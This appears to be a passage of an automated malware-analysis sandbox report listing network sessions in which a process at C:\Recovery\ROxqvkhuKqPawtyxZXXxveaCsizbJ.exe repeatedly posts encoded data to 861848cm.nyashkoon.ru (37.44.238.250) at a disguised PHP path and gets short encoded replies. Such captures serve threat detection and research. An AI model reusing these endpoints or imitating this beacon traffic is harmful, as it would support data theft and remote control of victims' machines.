                                                                    Data Raw: 00 1e 23 06 28 5c 39 07 24 05 33 0c 2a 2e 39 58 29 30 06 03 2c 22 38 59 28 33 02 5b 29 06 3c 18 20 2f 33 15 35 1c 2d 59 20 21 23 5b 3c 2b 21 5f 05 1d 39 13 24 17 2c 55 3e 0c 2a 16 3d 0e 34 46 26 56 28 43 29 05 2e 13 20 14 04 55 25 00 0b 58 32 0c 37 53 28 1a 2d 18 3a 59 23 1d 25 3a 2a 57 09 16 20 55 25 30 30 01 3e 31 2b 1d 33 10 35 5a 26 14 23 57 3e 3f 2c 04 23 42 3d 01 3e 20 37 1c 23 27 3a 5d 27 39 22 09 24 2d 20 0b 2b 22 26 55 22 0d 20 54 01 30 5d 4f
                                                                    Data Ascii: #(\9$3*.9X)0,"8Y(3[)< /35-Y !#[<+!_9$,U>*=4F&V(C). U%X27S(-:Y#%:*W U%00>1+35Z&#W>?,#B=> 7#':]'9"$- +"&U" T0]O


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    22192.168.2.44976337.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:35.270493031 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:35.625827074 CET1012OUTData Raw: 56 57 5a 5f 56 5e 50 5c 5a 5f 52 51 54 5b 5b 53 55 51 59 5e 51 56 52 5f 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VWZ_V^P\Z_RQT[[SUQY^QVR_QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%^/"(8<3 ]>96=)'4<%+.4.58\!'21'X$.Q-"
                                                                    Nov 6, 2024 03:37:36.097726107 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:36.167656898 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    23192.168.2.44976437.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:36.299118996 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:36.656991959 CET1012OUTData Raw: 56 53 5a 5f 53 5b 55 58 5a 5f 52 51 54 5e 5b 52 55 57 59 5e 51 51 52 53 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VSZ_S[UXZ_RQT^[RUWY^QQRSQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&/T($+ \*"=50( 4<=(>:C<#Q&_29'X$.Q-6
                                                                    Nov 6, 2024 03:37:37.117599010 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:37.190800905 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    24192.168.2.44976537.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:38.151451111 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:38.500813007 CET1012OUTData Raw: 53 52 5f 5b 53 5d 50 5a 5a 5f 52 51 54 5d 5b 52 55 5d 59 5e 51 5e 52 5a 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SR_[S]PZZ_RQT][RU]Y^Q^RZQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&,)?8<U7*:1Y=[6\0/#/*?+Z-68^4'2\%'X$.Q-
                                                                    Nov 6, 2024 03:37:38.973120928 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:39.052670002 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    25192.168.2.44976637.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:39.175318003 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:39.531972885 CET1012OUTData Raw: 56 5e 5a 5c 56 5b 55 58 5a 5f 52 51 54 5f 5b 52 55 54 59 56 51 5e 52 59 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: V^Z\V[UXZ_RQT_[RUTYVQ^RYQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&/-?4?+=*1Y*==%(, ?=<./-<_#Q.]&9'X$.Q-2
                                                                    Nov 6, 2024 03:37:39.988178968 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:40.059659004 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    26192.168.2.44976737.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:40.528902054 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    27192.168.2.44976837.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:40.929636002 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:41.282001019 CET1012OUTData Raw: 56 53 5a 59 56 56 55 59 5a 5f 52 51 54 53 5b 5c 55 5d 59 59 51 50 52 5d 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VSZYVVUYZ_RQTS[\U]YYQPR]QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%]8,)?Y+3(95>%++"/+X3Y,5!72_')'X$.Q-
                                                                    Nov 6, 2024 03:37:41.738755941 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:41.816730022 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    28192.168.2.44976937.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:41.945715904 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:42.297751904 CET1012OUTData Raw: 56 55 5a 5f 53 5c 50 5d 5a 5f 52 51 54 5b 5b 52 55 50 59 5a 51 53 52 53 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VUZ_S\P]Z_RQT[[RUPYZQSRSQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%X;??;?>#<\):%=5%;<[4-(>9%_!')19'X$.Q-"
                                                                    Nov 6, 2024 03:37:42.757407904 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:42.831504107 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    29192.168.2.44977037.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:43.266388893 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:43.625706911 CET1012OUTData Raw: 53 55 5a 54 56 5b 55 59 5a 5f 52 51 54 5b 5b 53 55 5d 59 5e 51 54 52 5f 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SUZTV[UYZ_RQT[[SU]Y^QTR_QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%/S=88+3'==)=\%(+4?T(>?[9&377X19'X$.Q-"
                                                                    Nov 6, 2024 03:37:44.085262060 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:44.162945986 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    30192.168.2.44977137.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:44.282577038 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:44.641364098 CET1012OUTData Raw: 56 53 5f 59 56 5c 50 53 5a 5f 52 51 54 5c 5b 52 55 56 59 56 51 53 52 5e 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VS_YV\PSZ_RQT\[RUVYVQSR^QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%Y,6T?<<4[(9"*)3^4#:)>.%04'2'X$.Q->
                                                                    Nov 6, 2024 03:37:45.097348928 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:45.177006960 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    31192.168.2.44977237.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:45.305135965 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:45.658005953 CET1012OUTData Raw: 56 5f 5f 5b 56 5f 50 5f 5a 5f 52 51 54 5f 5b 5e 55 5d 59 58 51 57 52 52 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: V__[V_P_Z_RQT_[^U]YXQWRRQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%_85=;?(7*:?>*%( <=+>.&;#$:')'X$.Q-2
                                                                    Nov 6, 2024 03:37:46.127073050 CET25INHTTP/1.1 100 Continue


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    32192.168.2.44977337.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:46.138686895 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1252
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:46.485275030 CET1252OUTData Raw: 53 56 5a 5a 53 5c 50 5a 5a 5f 52 51 54 5d 5b 5f 55 5d 59 56 51 52 52 58 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SVZZS\PZZ_RQT][_U]YVQRRXQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&;.((3<=*5)[5$,Y72(+[.%Y7Q-19'X$.Q-
                                                                    Nov 6, 2024 03:37:46.951426029 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:47.029788017 CET308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 00 1e 20 14 3c 03 2a 5b 27 02 2c 18 3e 3d 39 13 28 56 30 05 2f 0b 28 5a 2a 1d 28 59 3d 01 27 08 20 01 02 07 21 1c 3d 11 23 0c 33 5a 28 3b 21 5f 05 1d 39 59 33 29 3c 12 2a 54 31 04 3d 34 33 1a 26 23 2b 1b 2a 15 00 11 34 14 3e 11 31 2d 22 02 32 21 30 0d 28 37 25 5c 39 01 20 0e 32 00 2a 57 09 16 23 0f 33 0d 3f 5b 29 21 02 07 27 07 29 59 26 29 27 56 3e 5a 3f 59 23 0a 3e 1a 2a 1d 2f 5e 21 51 32 10 26 39 31 1c 25 00 2c 0b 3f 22 26 55 22 0d 20 54 01 30 5d 4f
                                                                    Data Ascii: <*[',>=9(V0/(Z*(Y=' !=#3Z(;!_9Y3)<*T1=43&#+*4>1-"2!0(7%\9 2*W#3?[)!')Y&)'V>Z?Y#>*/^!Q2&91%,?"&U" T0]O


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    33192.168.2.44977437.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:46.585927010 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:46.938522100 CET1012OUTData Raw: 56 57 5a 54 56 5d 55 5d 5a 5f 52 51 54 5e 5b 5b 55 50 59 5f 51 53 52 5b 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VWZTV]U]Z_RQT^[[UPY_QSR[QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%]8?)+ ]+7*!X?-93^#4)(\.6/42)'X$.Q-6
                                                                    Nov 6, 2024 03:37:47.401441097 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:47.478071928 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    34192.168.2.44977537.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:47.594944954 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:47.953941107 CET1012OUTData Raw: 56 50 5a 5f 56 5f 50 5f 5a 5f 52 51 54 5c 5b 52 55 53 59 58 51 51 52 52 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VPZ_V_P_Z_RQT\[RUSYXQQRRQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%;<)=+;<X>\"?>!3##&?3\9?74=%'X$.Q->
                                                                    Nov 6, 2024 03:37:48.414443970 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:48.492225885 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    35192.168.2.44977637.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:49.201839924 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:49.547601938 CET1012OUTData Raw: 56 5f 5a 5b 53 5f 50 59 5a 5f 52 51 54 5e 5b 5b 55 51 59 5a 51 52 52 58 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: V_Z[S_PYZ_RQT^[[UQYZQRRXQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&,&? <))!==*'("/.W+39%;#7!19'X$.Q-6
                                                                    Nov 6, 2024 03:37:50.004352093 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:50.080535889 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    36192.168.2.44977737.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:50.212451935 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
